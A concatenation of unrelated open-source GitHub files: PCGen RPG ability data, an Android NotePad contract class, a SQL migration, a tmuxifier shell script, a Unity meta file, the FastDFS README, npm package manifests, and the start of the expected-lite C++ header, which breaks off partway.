ABILITYCATEGORY:Occultist Archetype VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Archetype TYPE:Occultist Archetype.OccultistArchetype PLURAL:Occultist Archetypes DISPLAYLOCATION:Archetype
ABILITYCATEGORY:Psychic Archetype VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Archetype TYPE:Psychic Archetype.PsychicArchetype PLURAL:Psychic Archetypes DISPLAYLOCATION:Archetype
ABILITYCATEGORY:Spiritualist Archetype VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Archetype TYPE:Spiritualist Archetype.SpiritualistArchetype PLURAL:Spiritualist Archetypes DISPLAYLOCATION:Archetype
# Kineticist class features
# Ability Category Visible Editable? Change Pool? Fractional values? Base Pool number Category of Object Type of Object Specific choices list Plural description for UI Display Location
ABILITYCATEGORY:Kineticist Blast Type VISIBLE:NO EDITABLE:NO EDITPOOL:YES FRACTIONALPOOL:NO CATEGORY:Kineticist Blast Type
ABILITYCATEGORY:Kineticist Wild Talent VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:Wild Talent PLURAL:Kineticist Wild Talents DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Kineticist Element VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:NO POOL:Pool_KineticistElementalFocus CATEGORY:Special Ability TYPE:Kineticist Element PLURAL:Kineticist Elements DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Kineticist Blast VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:NO CATEGORY:Special Ability TYPE:Simple Blast PLURAL:Simple Blasts DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Kineticist Expanded Element VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:NO POOL:Pool_KineticistExpandedElement CATEGORY:Special Ability TYPE:Kineticist Expanded Element PLURAL:Kineticist Expanded Elements DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Kineticist Utility Wild Talent VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:NO POOL:Pool_KineticistUtilityWildTalents CATEGORY:Special Ability TYPE:Utility Wild Talent PLURAL:Utility Wild Talents DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Kineticist Infusion Wild Talent VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:NO POOL:Pool_KineticistInfusion CATEGORY:Special Ability TYPE:Infusion Wild Talent PLURAL:Infusion Wild Talents DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Kineticist Infusion or Wild Talent Aether VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:NO CATEGORY:Special Ability TYPE:Infusion Wild Talent Aether.Utility Wild Talent Aether DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Kineticist Infusion or Wild Talent Air VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:NO CATEGORY:Special Ability TYPE:Infusion Wild Talent Air.Utility Wild Talent Air DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Kineticist Infusion or Wild Talent Earth VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:NO CATEGORY:Special Ability TYPE:Infusion Wild Talent Earth.Utility Wild Talent Earth DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Kineticist Infusion or Wild Talent Fire VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:NO CATEGORY:Special Ability TYPE:Infusion Wild Talent Fire.Utility Wild Talent Fire DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Kineticist Infusion or Wild Talent Water VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:NO CATEGORY:Special Ability TYPE:Infusion Wild Talent Water.Utility Wild Talent Water DISPLAYLOCATION:Class Features
# Occultist class features
ABILITYCATEGORY:Occultist Mental Focus VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:OccultistMentalFocus PLURAL:Occultist Mental Foci DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Occultist Physical Enhancement VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:OccultistPhysicalEnhancement PLURAL:Occultist Physical Enhancements DISPLAYLOCATION:Class Features
# Medium class features
# Ability Category Visible Editable? Change Pool? Fractional values? Base Pool number Category of Object Type of Object Specific choices list Plural description for UI Display Location
ABILITYCATEGORY:Medium Spirit Choice VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:MediumSpirit PLURAL:Medium Spirit Choices DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Champion Weapon Choice VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:ChampionWeapon PLURAL:Champion Weapon Choices DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Champion Feat Choice VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:ChampionFeat PLURAL:Champion Feat Choices DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Hierophant Energy Font Choice VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:HierophantEnergyFont PLURAL:Hierophant Energy Font Choices DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Marshal Seance Boon VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:SeanceBoon PLURAL:Marshal Seance Boons DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Trickster Seance Boon VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:TricksterBoon PLURAL:Trickster Seance Boons DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Trickster Skill Choice VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:TricksterSkill PLURAL:Trickster Skill Choices DISPLAYLOCATION:Class Features
# Bonus wizard spells
ABILITYCATEGORY:Medium Wizard Spell 0 VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:MediumWizard0 PLURAL:Medium Wizard Spells 0 DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Medium Wizard Spell 1 VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:MediumWizard1 PLURAL:Medium Wizard Spells 1 DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Medium Wizard Spell 2 VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:MediumWizard2 PLURAL:Medium Wizard Spells 2 DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Medium Wizard Spell 3 VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:MediumWizard3 PLURAL:Medium Wizard Spells 3 DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Medium Wizard Spell 4 VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:MediumWizard4 PLURAL:Medium Wizard Spells 4 DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Medium Wizard Spell 5 VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:MediumWizard5 PLURAL:Medium Wizard Spells 5 DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Medium Wizard Spell 6 VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:MediumWizard6 PLURAL:Medium Wizard Spells 6 DISPLAYLOCATION:Class Features
# Bonus cleric spells
ABILITYCATEGORY:Medium Cleric Spell 0 VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:MediumCleric0 PLURAL:Medium Cleric Spells 0 DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Medium Cleric Spell 1 VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:MediumCleric1 PLURAL:Medium Cleric Spells 1 DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Medium Cleric Spell 2 VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:MediumCleric2 PLURAL:Medium Cleric Spells 2 DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Medium Cleric Spell 3 VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:MediumCleric3 PLURAL:Medium Cleric Spells 3 DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Medium Cleric Spell 4 VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:MediumCleric4 PLURAL:Medium Cleric Spells 4 DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Medium Cleric Spell 5 VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:MediumCleric5 PLURAL:Medium Cleric Spells 5 DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Medium Cleric Spell 6 VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:MediumCleric6 PLURAL:Medium Cleric Spells 6 DISPLAYLOCATION:Class Features
# Mesmerist class features
# Ability Category Visible Editable? Change Pool? Fractional values? Base Pool number Category of Object Type of Object Specific choices list Plural description for UI Display Location
ABILITYCATEGORY:Mesmerist Trick Choice VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:MesmeristTrick PLURAL:Mesmerist Trick Choices DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Bold Stare Choice VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:BoldStare PLURAL:Bold Stare Choices DISPLAYLOCATION:Class Features
# Mesmerist archetype class features
# Ability Category Visible Editable? Change Pool? Fractional values? Base Pool number Category of Object Type of Object Specific choices list Plural description for UI Display Location
ABILITYCATEGORY:Injection Improvement Choice VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:InjectionImprovement PLURAL:Injection Improvement Choices DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Vexing Daredevil Martial Weapon Proficiency VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:VexingDaredevilWpnProf PLURAL:Vexing Daredevil Martial Weapon Proficiencies DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Vexing Daredevil Bonus Stare Feat VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Feat TYPE:Stare PLURAL:Vexing Daredevil Bonus Stare Feats DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Dazzling Feint Choice VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES CATEGORY:Special Ability TYPE:DazzlingFeint PLURAL:Dazzling Feint Choices DISPLAYLOCATION:Class Features
###
ABILITYCATEGORY:Phrenic Amplification VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:NO CATEGORY:Special Ability TYPE:Phrenic Amplification PLURAL:Phrenic Amplifications DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Psychic Discipline VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:NO CATEGORY:Special Ability TYPE:Psychic Discipline PLURAL:Psychic Disciplines DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Phantom Emotional Focus VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:NO CATEGORY:Special Ability TYPE:Phantom Emotional Focus PLURAL:Emotional Focuses DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Phantom Manifestation VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:NO CATEGORY:Special Ability TYPE:Phantom Manifestation PLURAL:Phantom Manifestation DISPLAYLOCATION:Race Abilities
ABILITYCATEGORY:Phantom Size VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:NO CATEGORY:Internal TYPE:Phantom Size PLURAL:Phantom Size DISPLAYLOCATION:Race Abilities
ABILITYCATEGORY:Implement School VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:NO POOL:OccultistImplementSchool CATEGORY:Special Ability TYPE:Implement School PLURAL:Implement Schools DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Implement School Focus Power VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:NO POOL:OccultistFocusPower CATEGORY:Special Ability TYPE:Implement School Focus Power PLURAL:Implement School Focus Powers DISPLAYLOCATION:Class Features
ABILITYCATEGORY:Homunculus Companion Custom Skills VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:NO CATEGORY:Special Ability TYPE:HomunculusCompanionCustomSkills DISPLAYLOCATION:Race Abilities
ABILITYCATEGORY:Homunculus Companion Ability Increase VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:NO CATEGORY:Special Ability TYPE:HomunculusCompanionAbilityIncrease PLURAL:Homunculus Companion Ability Increases DISPLAYLOCATION:Race Abilities
ABILITYCATEGORY:Elemental Annihilator Feat VISIBLE:QUALIFY EDITABLE:YES EDITPOOL:YES FRACTIONALPOOL:NO CATEGORY:Internal TYPE:Elemental Annihilator Feat DISPLAYLOCATION:Feats
| {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2007 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.example.android.notepad;
import android.net.Uri;
import android.provider.BaseColumns;
/**
* Defines a contract between the Note Pad content provider and its clients. A contract defines the
* information that a client needs to access the provider as one or more data tables. A contract
* is a public, non-extendable (final) class that contains constants defining column names and
* URIs. A well-written client depends only on the constants in the contract.
*/
public final class NotePad {
public static final String AUTHORITY = "com.google.provider.NotePad";
// This class cannot be instantiated
private NotePad() {
}
/**
* Notes table contract
*/
public static final class Notes implements BaseColumns {
// This class cannot be instantiated
private Notes() {}
/**
* The table name offered by this provider
*/
public static final String TABLE_NAME = "notes";
/*
* URI definitions
*/
/**
* The scheme part for this provider's URI
*/
private static final String SCHEME = "content://";
/**
* Path parts for the URIs
*/
/**
* Path part for the Notes URI
*/
private static final String PATH_NOTES = "/notes";
/**
* Path part for the Note ID URI
*/
private static final String PATH_NOTE_ID = "/notes/";
/**
* 0-relative position of a note ID segment in the path part of a note ID URI
*/
public static final int NOTE_ID_PATH_POSITION = 1;
/**
* Path part for the Live Folder URI
*/
private static final String PATH_LIVE_FOLDER = "/live_folders/notes";
/**
* The content:// style URL for this table
*/
public static final Uri CONTENT_URI = Uri.parse(SCHEME + AUTHORITY + PATH_NOTES);
/**
* The content URI base for a single note. Callers must
* append a numeric note id to this Uri to retrieve a note
*/
public static final Uri CONTENT_ID_URI_BASE
= Uri.parse(SCHEME + AUTHORITY + PATH_NOTE_ID);
/**
* The content URI match pattern for a single note, specified by its ID. Use this to match
* incoming URIs or to construct an Intent.
*/
public static final Uri CONTENT_ID_URI_PATTERN
= Uri.parse(SCHEME + AUTHORITY + PATH_NOTE_ID + "/#");
/**
* The content Uri pattern for a notes listing for live folders
*/
public static final Uri LIVE_FOLDER_URI
= Uri.parse(SCHEME + AUTHORITY + PATH_LIVE_FOLDER);
/*
* MIME type definitions
*/
/**
* The MIME type of {@link #CONTENT_URI} providing a directory of notes.
*/
public static final String CONTENT_TYPE = "vnd.android.cursor.dir/vnd.google.note";
/**
* The MIME type of a {@link #CONTENT_URI} sub-directory of a single
* note.
*/
public static final String CONTENT_ITEM_TYPE = "vnd.android.cursor.item/vnd.google.note";
/**
* The default sort order for this table
*/
public static final String DEFAULT_SORT_ORDER = "modified DESC";
/*
* Column definitions
*/
/**
* Column name for the title of the note
* <P>Type: TEXT</P>
*/
public static final String COLUMN_NAME_TITLE = "title";
/**
* Column name of the note content
* <P>Type: TEXT</P>
*/
public static final String COLUMN_NAME_NOTE = "note";
/**
* Column name for the creation timestamp
* <P>Type: INTEGER (long from System.curentTimeMillis())</P>
*/
public static final String COLUMN_NAME_CREATE_DATE = "created";
/**
* Column name for the modification timestamp
* <P>Type: INTEGER (long from System.curentTimeMillis())</P>
*/
public static final String COLUMN_NAME_MODIFICATION_DATE = "modified";
}
}
| {
"pile_set_name": "Github"
} |
-- This file should undo anything in `up.sql`
ALTER TABLE notifications ADD COLUMN title VARCHAR NOT NULL;
ALTER TABLE notifications ADD COLUMN content TEXT;
ALTER TABLE notifications ADD COLUMN link VARCHAR;
ALTER TABLE notifications ADD COLUMN data VARCHAR;
ALTER TABLE notifications DROP COLUMN kind;
ALTER TABLE notifications DROP COLUMN object_id;
| {
"pile_set_name": "Github"
} |
#! /usr/bin/env bash
set -e
[ -n "$TMUXIFIER_DEBUG" ] && set -x
# Load internal utility functions.
source "$TMUXIFIER/lib/util.sh"
# Provide tmuxifier help
if calling-help "$@"; then
echo "usage: tmuxifier load-window <layout_name | file_path>
Aliases: window, win, w
Create a new window using the specified window layout in the current session.
Arguments:
<layout_name | file_path> - Name of a window layout stored in the layouts
directory, or path to a window layout file."
exit
fi
# Provide tmuxifier completions
if calling-complete "$@"; then
tmuxifier-list-windows
exit
fi
if [ -z "$1" ]; then
echo "$(tmuxifier-help load-window $@)" >&2
exit 1
fi
# Load runtime functions.
source "$TMUXIFIER/lib/runtime.sh"
if [ ! -z $TMUX ]; then
session="$(tmuxifier-current-session)"
load_window "$1"
else
echo "tmuxifier: 'load-window' command can only be used from within Tmux."
exit 1
fi
| {
"pile_set_name": "Github"
} |
fileFormatVersion: 2
guid: efee954c69f0d421086729bb8df1137f
timeCreated: 1490044676
licenseType: Store
MonoImporter:
serializedVersion: 2
defaultReferences: []
executionOrder: -221
icon: {instanceID: 0}
userData:
assetBundleName:
assetBundleVariant:
| {
"pile_set_name": "Github"
} |
Copyright (C) 2008 Happy Fish / YuQing
FastDFS may be copied only under the terms of the GNU General
Public License V3, which may be found in the FastDFS source kit.
Please visit the FastDFS Home Page for more detail.
Chinese language: http://www.fastken.com/
FastDFS is an open source high performance distributed file system. It's major
functions include: file storing, file syncing and file accessing (file uploading
and file downloading), and it can resolve the high capacity and load balancing
problem. FastDFS should meet the requirement of the website whose service based
on files such as photo sharing site and video sharing site.
FastDFS has two roles: tracker and storage. The tracker takes charge of
scheduling and load balancing for file access. The storage store files and it's
function is file management including: file storing, file syncing, providing file
access interface. It also manage the meta data which are attributes representing
as key value pair of the file. For example: width=1024, the key is "width" and
the value is "1024".
The tracker and storage contain one or more servers. The servers in the tracker
or storage cluster can be added to or removed from the cluster by any time without
affecting the online services. The servers in the tracker cluster are peer to peer.
The storarge servers organizing by the file volume/group to obtain high capacity.
The storage system contains one or more volumes whose files are independent among
these volumes. The capacity of the whole storage system equals to the sum of all
volumes' capacity. A file volume contains one or more storage servers whose files
are same among these servers. The servers in a file volume backup each other,
and all these servers are load balancing. When adding a storage server to a
volume, files already existing in this volume are replicated to this new server
automatically, and when this replication done, system will switch this server
online to providing storage services.
When the whole storage capacity is insufficiency, you can add one or more
volumes to expand the storage capacity. To do this, you need to add one or
more storage servers.
The identification of a file is composed of two parts: the volume name and
the file name.
Client test code use client library please refer to the directory: client/test.
For more FastDFS related articles, please subscribe the Wechat/Weixin public account
(Chinese Language): fastdfs
| {
"pile_set_name": "Github"
} |
{
"name": "methods",
"version": "1.1.0",
"description": "HTTP methods that node supports",
"main": "index.js",
"scripts": {
"test": "./node_modules/mocha/bin/mocha"
},
"keywords": [
"http",
"methods"
],
"author": {
"name": "TJ Holowaychuk"
},
"license": "MIT",
"repository": {
"type": "git",
"url": "git://github.com/visionmedia/node-methods.git"
},
"devDependencies": {
"mocha": "1.17.x"
},
"readme": "\n# Methods\n\n HTTP verbs that node core's parser supports.\n",
"readmeFilename": "Readme.md",
"bugs": {
"url": "https://github.com/visionmedia/node-methods/issues"
},
"homepage": "https://github.com/visionmedia/node-methods",
"_id": "[email protected]",
"_from": "[email protected]"
}
| {
"pile_set_name": "Github"
} |
{
"name": "qs",
"description": "A querystring parser that supports nesting and arrays, with a depth limit",
"homepage": "https://github.com/ljharb/qs",
"version": "6.3.1",
"repository": {
"type": "git",
"url": "git+https://github.com/ljharb/qs.git"
},
"main": "lib/index.js",
"contributors": [
{
"name": "Jordan Harband",
"email": "[email protected]",
"url": "http://ljharb.codes"
}
],
"keywords": [
"querystring",
"qs"
],
"engines": {
"node": ">=0.6"
},
"dependencies": {},
"devDependencies": {
"@ljharb/eslint-config": "^11.0.0",
"browserify": "^14.1.0",
"covert": "^1.1.0",
"eslint": "^3.15.0",
"evalmd": "^0.0.17",
"iconv-lite": "^0.4.15",
"mkdirp": "^0.5.1",
"parallelshell": "^2.0.0",
"qs-iconv": "^1.0.4",
"safe-publish-latest": "^1.1.1",
"tape": "^4.6.3"
},
"scripts": {
"prepublish": "safe-publish-latest && npm run dist",
"pretest": "npm run --silent readme && npm run --silent lint",
"test": "npm run --silent coverage",
"tests-only": "node test",
"readme": "evalmd README.md",
"lint": "eslint lib/*.js test/*.js",
"coverage": "covert test",
"dist": "mkdirp dist && browserify --standalone Qs lib/index.js > dist/qs.js"
},
"license": "BSD-3-Clause",
"gitHead": "153ce84948845330d90178cbad982fc7371df538",
"bugs": {
"url": "https://github.com/ljharb/qs/issues"
},
"_id": "[email protected]",
"_shasum": "918c0b3bcd36679772baf135b1acb4c1651ed79d",
"_from": "[email protected]",
"_npmVersion": "4.1.2",
"_nodeVersion": "7.5.0",
"_npmUser": {
"name": "ljharb",
"email": "[email protected]"
},
"dist": {
"shasum": "918c0b3bcd36679772baf135b1acb4c1651ed79d",
"tarball": "https://registry.npmjs.org/qs/-/qs-6.3.1.tgz"
},
"maintainers": [
{
"name": "hueniverse",
"email": "[email protected]"
},
{
"name": "ljharb",
"email": "[email protected]"
},
{
"name": "nlf",
"email": "[email protected]"
}
],
"_npmOperationalInternal": {
"host": "packages-12-west.internal.npmjs.com",
"tmp": "tmp/qs-6.3.1.tgz_1487220058786_0.35462796757929027"
},
"directories": {},
"_resolved": "https://registry.npmjs.org/qs/-/qs-6.3.1.tgz"
}
| {
"pile_set_name": "Github"
} |
// This version targets C++11 and later.
//
// Copyright (C) 2016-2018 Martin Moene.
//
// Distributed under the Boost Software License, Version 1.0.
// (See accompanying file LICENSE.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
//
// expected lite is based on:
// A proposal to add a utility class to represent expected monad
// by Vicente J. Botet Escriba and Pierre Talbot. http:://wg21.link/p0323
#ifndef NONSTD_EXPECTED_LITE_HPP
#define NONSTD_EXPECTED_LITE_HPP
#define expected_lite_MAJOR 0
#define expected_lite_MINOR 4
#define expected_lite_PATCH 0
#define expected_lite_VERSION expected_STRINGIFY(expected_lite_MAJOR) "." expected_STRINGIFY(expected_lite_MINOR) "." expected_STRINGIFY(expected_lite_PATCH)
#define expected_STRINGIFY( x ) expected_STRINGIFY_( x )
#define expected_STRINGIFY_( x ) #x
// expected-lite configuration:
#define nsel_EXPECTED_DEFAULT 0
#define nsel_EXPECTED_NONSTD 1
#define nsel_EXPECTED_STD 2
#if !defined( nsel_CONFIG_SELECT_EXPECTED )
# define nsel_CONFIG_SELECT_EXPECTED ( nsel_HAVE_STD_EXPECTED ? nsel_EXPECTED_STD : nsel_EXPECTED_NONSTD )
#endif
// Proposal revisions:
//
// DXXXXR0: --
// N4015 : -2 (2014-05-26)
// N4109 : -1 (2014-06-29)
// P0323R0: 0 (2016-05-28)
// P0323R1: 1 (2016-10-12)
// -------:
// P0323R2: 2 (2017-06-15)
// P0323R3: 3 (2017-10-15)
// P0323R4: 4 (2017-11-26)
// P0323R5: 5 (2018-02-08)
// P0323R6: 6 (2018-04-02)
// P0323R7: 7 (2018-06-22) *
//
// expected-lite uses 2 and higher
#ifndef nsel_P0323R
# define nsel_P0323R 7
#endif
// Control presence of exception handling (try and auto discover):
#ifndef nsel_CONFIG_NO_EXCEPTIONS
# if defined(__cpp_exceptions) || defined(__EXCEPTIONS) || defined(_CPPUNWIND)
# define nsel_CONFIG_NO_EXCEPTIONS 0
# else
# define nsel_CONFIG_NO_EXCEPTIONS 1
# endif
#endif
// C++ language version detection (C++20 is speculative):
// Note: VC14.0/1900 (VS2015) lacks too much from C++14.
#ifndef nsel_CPLUSPLUS
# if defined(_MSVC_LANG ) && !defined(__clang__)
# define nsel_CPLUSPLUS (_MSC_VER == 1900 ? 201103L : _MSVC_LANG )
# else
# define nsel_CPLUSPLUS __cplusplus
# endif
#endif
#define nsel_CPP98_OR_GREATER ( nsel_CPLUSPLUS >= 199711L )
#define nsel_CPP11_OR_GREATER ( nsel_CPLUSPLUS >= 201103L )
#define nsel_CPP14_OR_GREATER ( nsel_CPLUSPLUS >= 201402L )
#define nsel_CPP17_OR_GREATER ( nsel_CPLUSPLUS >= 201703L )
#define nsel_CPP20_OR_GREATER ( nsel_CPLUSPLUS >= 202000L )
// Use C++20 std::expected if available and requested:
#if nsel_CPP20_OR_GREATER && defined(__has_include )
# if __has_include( <expected> )
# define nsel_HAVE_STD_EXPECTED 1
# else
# define nsel_HAVE_STD_EXPECTED 0
# endif
#else
# define nsel_HAVE_STD_EXPECTED 0
#endif
#define nsel_USES_STD_EXPECTED ( (nsel_CONFIG_SELECT_EXPECTED == nsel_EXPECTED_STD) || ((nsel_CONFIG_SELECT_EXPECTED == nsel_EXPECTED_DEFAULT) && nsel_HAVE_STD_EXPECTED) )
//
// in_place: code duplicated in any-lite, expected-lite, optional-lite, value-ptr-lite, variant-lite:
//
#ifndef nonstd_lite_HAVE_IN_PLACE_TYPES
#define nonstd_lite_HAVE_IN_PLACE_TYPES 1
// C++17 std::in_place in <utility>:
#if nsel_CPP17_OR_GREATER
#include <utility>
namespace nonstd {
using std::in_place;
using std::in_place_type;
using std::in_place_index;
using std::in_place_t;
using std::in_place_type_t;
using std::in_place_index_t;
#define nonstd_lite_in_place_t( T) std::in_place_t
#define nonstd_lite_in_place_type_t( T) std::in_place_type_t<T>
#define nonstd_lite_in_place_index_t(K) std::in_place_index_t<K>
#define nonstd_lite_in_place( T) std::in_place_t{}
#define nonstd_lite_in_place_type( T) std::in_place_type_t<T>{}
#define nonstd_lite_in_place_index(K) std::in_place_index_t<K>{}
} // namespace nonstd
#else // nsel_CPP17_OR_GREATER
#include <cstddef>
namespace nonstd {
namespace detail {
template< class T >
struct in_place_type_tag {};
template< std::size_t K >
struct in_place_index_tag {};
} // namespace detail
struct in_place_t {};
template< class T >
inline in_place_t in_place( detail::in_place_type_tag<T> = detail::in_place_type_tag<T>() )
{
return in_place_t();
}
template< std::size_t K >
inline in_place_t in_place( detail::in_place_index_tag<K> = detail::in_place_index_tag<K>() )
{
return in_place_t();
}
template< class T >
inline in_place_t in_place_type( detail::in_place_type_tag<T> = detail::in_place_type_tag<T>() )
{
return in_place_t();
}
template< std::size_t K >
inline in_place_t in_place_index( detail::in_place_index_tag<K> = detail::in_place_index_tag<K>() )
{
return in_place_t();
}
// mimic templated typedef:
#define nonstd_lite_in_place_t( T) nonstd::in_place_t(&)( nonstd::detail::in_place_type_tag<T> )
#define nonstd_lite_in_place_type_t( T) nonstd::in_place_t(&)( nonstd::detail::in_place_type_tag<T> )
#define nonstd_lite_in_place_index_t(K) nonstd::in_place_t(&)( nonstd::detail::in_place_index_tag<K> )
#define nonstd_lite_in_place( T) nonstd::in_place_type<T>
#define nonstd_lite_in_place_type( T) nonstd::in_place_type<T>
#define nonstd_lite_in_place_index(K) nonstd::in_place_index<K>
} // namespace nonstd
#endif // nsel_CPP17_OR_GREATER
#endif // nonstd_lite_HAVE_IN_PLACE_TYPES
//
// Using std::expected:
//
#if nsel_USES_STD_EXPECTED
#include <expected>
namespace nonstd {
using std::expected;
// ...
}
#else // nsel_USES_STD_EXPECTED
#include <cassert>
#include <exception>
#include <functional>
#include <initializer_list>
#include <memory>
#include <new>
#include <system_error>
#include <type_traits>
#include <utility>
// additional includes:
#if nsel_CONFIG_NO_EXCEPTIONS
// already included: <cassert>
#else
# include <stdexcept>
#endif
// C++ feature usage:
#if nsel_CPP11_OR_GREATER
# define nsel_constexpr constexpr
#else
# define nsel_constexpr /*constexpr*/
#endif
#if nsel_CPP14_OR_GREATER
# define nsel_constexpr14 constexpr
#else
# define nsel_constexpr14 /*constexpr*/
#endif
#if nsel_CPP17_OR_GREATER
# define nsel_inline17 inline
#else
# define nsel_inline17 /*inline*/
#endif
// Compiler versions:
//
// MSVC++ 6.0 _MSC_VER == 1200 nsel_COMPILER_MSVC_VERSION == 60 (Visual Studio 6.0)
// MSVC++ 7.0 _MSC_VER == 1300 nsel_COMPILER_MSVC_VERSION == 70 (Visual Studio .NET 2002)
// MSVC++ 7.1 _MSC_VER == 1310 nsel_COMPILER_MSVC_VERSION == 71 (Visual Studio .NET 2003)
// MSVC++ 8.0 _MSC_VER == 1400 nsel_COMPILER_MSVC_VERSION == 80 (Visual Studio 2005)
// MSVC++ 9.0 _MSC_VER == 1500 nsel_COMPILER_MSVC_VERSION == 90 (Visual Studio 2008)
// MSVC++ 10.0 _MSC_VER == 1600 nsel_COMPILER_MSVC_VERSION == 100 (Visual Studio 2010)
// MSVC++ 11.0 _MSC_VER == 1700 nsel_COMPILER_MSVC_VERSION == 110 (Visual Studio 2012)
// MSVC++ 12.0 _MSC_VER == 1800 nsel_COMPILER_MSVC_VERSION == 120 (Visual Studio 2013)
// MSVC++ 14.0 _MSC_VER == 1900 nsel_COMPILER_MSVC_VERSION == 140 (Visual Studio 2015)
